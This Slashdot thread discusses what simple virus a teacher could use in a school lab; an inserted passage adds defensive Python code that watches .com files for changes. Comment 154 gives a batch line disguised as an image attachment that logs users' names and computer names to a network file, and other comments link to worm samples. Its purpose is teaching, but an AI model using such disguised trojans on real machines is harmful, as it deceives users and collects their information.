    Don't teach how to remove viruses. That is a moving target. Teach how viruses spread through specific examples. I think cross site scripting (XSS) is easy to teach them once they've done a little html authoring and had a little javascript programming. For this socially networked generation it applies to stuff they use EVERY hour of every day. A few of them were probably hit by that mouseover twitter exploit a few weeks ago. You can run an intentionally vulnerable server such as mutillidae to practice the exploits. http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 Read up on current exploits at http://owasp.org/ The future needs people to know how to not create exploits, and patch the ones they do. We don't need more IT "next clickers" who only know how to run third party solutions.

    --
    "The upgrade of thought is continuous"
  153. Why not Sony Rootkit by Nethemas+the+Great · · Score: 1

    Find any one of these and you'll have a few good lessons you can teach your students...

    --
    Two of my imaginary friends reproduced once ... with negative results.
  154. Small program by alxcsby · · Score: 1

    I made a "Trojan" for an office training program that is pretty simple. You can choose your method of transmission, I used an email with a funny attachment. It was FunnyPicture.exe, masked with the jpg.ico file. The FunnyPicture.exe file was just a bat file that I converted to an exe so I could use the different icon. The bat file was this: echo %username% %computername% >> "LOCATION\OF\TEXT\FILE\TO\STORE\USER\INFORMATION" Just replace the string in quotes with the location of a networked text file. You can modify this to do more, or write a basic script to pull up a picture. I had it feed them an image of a BSOD as a power point show. It was good simulation with no real damage, and got across the point how easy it is to lose critical data to a single thoughtless click. Best of luck, A.

  155. Wow that brings back memories! by DRAGONWEEZEL · · Score: 1

    Good times indeed!

    --
    How much is your data worth? Back it up now.
  156. Yeah... by Anonymous Coward · · Score: 0

    ... it's called Windows ! ;) =D

  157. Don't copy that floppy by Anonymous Coward · · Score: 0

    Virus to destroy the boot sector of a floppy perhaps.

  158. Re:Simple by Coren22 · · Score: 1

    Um, there are plenty of Mac viruses out there. Grow up, you really are acting like a 13 year old. I manage many Mac workstations too, and I have had to clean up enough infections because smug people like you try to say Mac is immune when it isn't, it is irrelevant. In a recent hacking contest between Linux, Windows 7 and Mac, the Mac fell first. So you managing 100 Mac workstations, 10 Mac servers, 50 Linux servers and 4 Windows boxes and pointing out how your Windows boxes cause more issues just shows your incompetence as a sys admin.

    --
    APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
  159. Re:DON'T DO IT! You'll get fired by xiang+shui · · Score: 1

    It does NOT pop up a message box, it's not executable code. It doesn't propagate. It's not a virus, simply a string of text that is recognized as one by every major AV software.

  160. Re:DON'T DO IT! You'll get fired by xiang+shui · · Score: 1

    Sorry to reply to my own post, but what I originally intended to point out was that it cannot be called from a batch file, as it's not executable.

  161. Use the Define virus by Fuzzums · · Score: 1

    It's only 30 bytes big and infects .com files in the current directory only.

    You can even make a virus scanner for it.

    Make a com file that only does RET (a one byte assembly statement).
    If the file gets infected, it grows.

    --
    Privacy is terrorism.
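
The canary check described in comment 161 (a one-byte RET .com file that grows if something modifies it), as an added example that is not part of the original comment. The function names, the file names and the 30 zero bytes standing in for a modification are assumptions constructed for the demonstration; only the RET canary and the 30-byte size come from the comment.

```python
import hashlib
import tempfile
from pathlib import Path

RET = b"\xC3"  # x86 RET: the one-byte .com canary the comment describes

def snapshot(directory):
    """Record size and SHA-256 of every .com file in the directory."""
    baseline = {}
    for path in sorted(Path(directory).glob("*.com")):
        data = path.read_bytes()
        baseline[path.name] = (len(data), hashlib.sha256(data).hexdigest())
    return baseline

def compare(directory, baseline):
    """Return {filename: finding} for files that differ from the baseline."""
    findings = {}
    current = snapshot(directory)
    for name, (size, digest) in baseline.items():
        if name not in current:
            findings[name] = "missing"
            continue
        new_size, new_digest = current[name]
        if new_size > size:
            findings[name] = f"grew by {new_size - size} bytes"
        elif new_size < size:
            findings[name] = f"shrank by {size - new_size} bytes"
        elif new_digest != digest:
            # An overwriting modification keeps the size; the hash still catches it.
            findings[name] = "same size, content changed"
    for name in current.keys() - baseline.keys():
        findings[name] = "new file"
    return findings

def demo():
    """Build a throwaway lab directory, alter one canary, report the findings."""
    with tempfile.TemporaryDirectory() as lab:
        canary = Path(lab, "canary.com")
        canary.write_bytes(RET)
        Path(lab, "clean.com").write_bytes(RET)
        baseline = snapshot(lab)
        # Constructed stand-in for an infection: 30 inert zero bytes, not real code.
        canary.write_bytes(RET + b"\x00" * 30)
        return compare(lab, baseline)

if __name__ == "__main__":
    print(demo())
```

Comparing hashes as well as sizes matters in a classroom discussion because a size check alone misses anything that overwrites a file in place.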
  162. network.vbs by Anonymous Coward · · Score: 0

    from circa march 2000: http://viruses17.blogspot.com/2008/07/vbscript-worm.html

  163. Re:DON'T DO IT! You'll get fired by Hegh · · Score: 1

    Umm... It IS executable. It prints "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" to the console when run as a COM program. It's just been added to the virus definitions of every piece of antivirus software to allow for simple, risk-free testing.

    --
    Bravery is not a function of firepower.
    ~J.C. Denton (Deus Ex)
  164. Eicar. The test virus. by AG+the+other · · Score: 1

    www.eicar.org/anti_virus_test_file.htm

    Eicar is a test virus. It's made precisely for what you want. However the last time I tried to download it my AV program detected it and blocked the download.

    AG

    --
    Non bene pro toto libertas venditur auro
  165. Re:DON'T DO IT! You'll get fired by xiang+shui · · Score: 1

    Oops, my bad. Thanks for the info!

  166. Re: by BlueRaja · · Score: 1

    If you have to ask, you clearly should not be doing this. I would say the same thing to a chemistry teacher asking what explosives to show her students.

  167. Now that is a BAD idea.... by niftymitch · · Score: 1

    Better to teach quality programming. Programs that defend themselves from buffer overflow and other stupid user tricks. A virus is not a school project and if it escapes you could end up in hot water. There is a phrase that yacht salesmen have. "If you have to ask the price you cannot afford it". If you have to ask where and what to get in the context of a virus ... you are not well enough equipped to teach the class. Better to teach quality defensive programming.

    --
    Truth is stranger than fiction, but it is because Fiction is obliged to stick to possibilities; Truth isn't. Mark Twain.
  168. Simple stuff by hdsink · · Score: 1

    I got tired of reading everyone's responses because I remember several instances where a simple line of missing code would cause havoc on anyone's computer back when we moved up from Commodore 64s. The not so obvious line of MOUSEINDOSBOX that would be missing would cause the mouse to not work back before DOS was loaded separately from Windows. Then there's the one when CDs came out that kept the CD from staying closed. Now I'm not a computer programmer by any means, but when Windows 98 became passe I gave up on trying to keep track of every file on my computer. Yes, I was one of those who would print out every file on my computer so that when I would install something new, I would know if something went wrong or not. There are all sorts of "simple" programs out there that can just be a nuisance on one's computer. Do you remember the one that would log you off if you were clicking your mouse too fast? The pop up stuff is a classic that most of us remember when the internet came about. The multiple browsers opening while you would be pressing on ALT+F4 consistently. That was a pain. Good luck with it.

  169. 1 oh 1 by DynaSoar · · Score: 1

    "I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions?"

    Yes. Teach them some useful Computer 101 stuff instead of wasting time on stuff that makes the computers useless. If you must cover the subject let them read http://en.wikipedia.org/wiki/Robert_Tappan_Morris Before you infect any machines, you should too.

    --
    "I may be synthetic, but I'm not stupid." -- Bishop 341-B
  170. Tobacco Mosaic was the first discovered... by John+Hasler · · Score: 1

    ...and is simple. Vaccinia is popular for research. ...Oh. That kind of "virus". Never mind.

    --
    Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
  171. Try this one by Anonymous Coward · · Score: 0

    http://archive.cert.uni-stuttgart.de/bugtraq/2003/06/msg00251.html
    Plays around with the EICAR test program. Not sure if the AV programs still have the same problems or if they even exist.

  172. Eicar by stasike · · Score: 1

    Look up the Eicar test virus.
    It is not a virus as such, just a text string you can create by a text editor, but all antivirus programs react to this and it is fun to see how antivirus reacts to your attempts to save file, unpack an archive or send email.

  173. Old Primary School Days by Slayer+Silver+Wolf · · Score: 1

    Back in the old days of primary school we had labs full of Macs. One day my friends and I discovered you could record your voice on them or other things and set that as the warning sound replacing the standard beep. After recording ourselves saying our favorite non rude South Park quotes we set them as the alert tone and went to lunch. The next day during our computer lesson the IT teacher told us off saying that after lunch the previous day she had the kindergarten kids in who love to button mash getting very freaked out as their computers told them off in a number of different ways.

  174. Ah! The good old days! by Anonymous Coward · · Score: 0

    I remember when I was in high school in the 90's. I got hold of a copy and reverse engineered the junkie virus. I had no internet back in those days and had to figure out for myself what the XOR instruction does to actually get the raw machine code. It was great fun!

    I then submitted my findings for a totally unrelated IT assignment and got a C just because I think the teacher feared me a little after that.

    The most awesome thing happened though later that year, around assessment time, the school got infected with an astounding number of viruses that took down the network and caused our end of semester results to be delayed by a few weeks. I could only attribute that to the fact that I had gotten a bit obsessive after the fun I'd had with junkie and used the school's internet to collect as many viruses from virus development sites as I could find. I stored them in a folder called "Warning Viruses - Do not run". I can only assume one of the network admins started clicking through them for a while until the school's lame virus scanner finally kicked in and detected one of them because that folder disappeared about the same time and no one questioned me about it.